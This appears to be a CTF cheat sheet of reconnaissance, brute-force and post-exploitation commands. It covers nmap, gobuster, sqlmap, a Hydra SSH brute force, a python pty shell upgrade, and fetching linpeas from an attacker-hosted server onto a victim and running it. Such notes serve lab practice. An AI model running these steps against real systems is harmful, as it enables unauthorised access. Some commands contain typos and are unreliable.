ctf setup

https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
LogoGitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)GitHub
LogoGitHub - ffuf/ffuf: Fast web fuzzer written in GoGitHub
LogoGitHub - OJ/gobuster: Directory/File, DNS and VHost busting tool written in GoGitHub
CyberChef
LogoFoxyProxy - Home
LogoFind out what websites are built with - Wappalyzer

SCANNING AND ENUMERATION

  1. Nmap -T4 -n <IP>

  2. rustscan

  3. Nmap -sVC -A <IP>

  4. Nmap -p -T4 -n <IP>

    1. Nping <IP>

    2. Unicornscan <IP>

    3. Netdiscover -r <IP>

    4. hping3

    5. Masscan <IP> -p<PORTS>

  6. Enum4linux <IP>

  7. SNMP

    1. Onesixtyone -c communityfile.txt <IP>

    2. Nmap <IP> -Pn -sU -p 161 -script=smp-brute

    3. Snmpwalk -c community -vSNMPVersion target mibvalue

  9. Http

    1. Robots.txt

    2. Admin.php

    3. Login.php

    4. Gobuster -u <IP> -w /usr/share/wordlists

    5. Wfuzz -w wordlist http://<IP>/FUZZ

    6. Dirb <IP>

    7. Sqlmap -u <IP>

  11. SMB

    1. Nbtscan <IP>

    2. Smbclient -L //<IP>

      1. Smbclient //mount/share

    4. Nmblookup -A <IP>

  13. Ftp

    1. ***LOUD*** wget -r ftp://anonymous:@10.10.10.152

    2. Us: anonymous pw: anonymous

  15. Ssh

  16. Brute forcing

    1. Hydra -l admin -P pass.txt <IP> -r 4 ssh

  18. Upgrading a dummy shell

  19. On Victim see what version of python is installed find / -name python* 2>/dev/null

  20. python# -C β€˜import pty; pty.spawn(β€œ/bin/bash”)’

  21. Ctrl Z

  22. Stty raw-echo;fg

Linux Privilege Escalation

on box (script enumeration)

  1. Upload Linpeas to target into a writable directory ex:\tmp, \home\user

    1. On Kali start your own web server where linpeas resides. Sudo python -m http.server 80

    2. From victim wget http://Kali-IP/linpeas.sh

    3. On Victim make linpeas executable chmod +x linpeas.sh

    4. ./linpeas.sh

PreviousSetupNextExploitation Frameworks

Last updated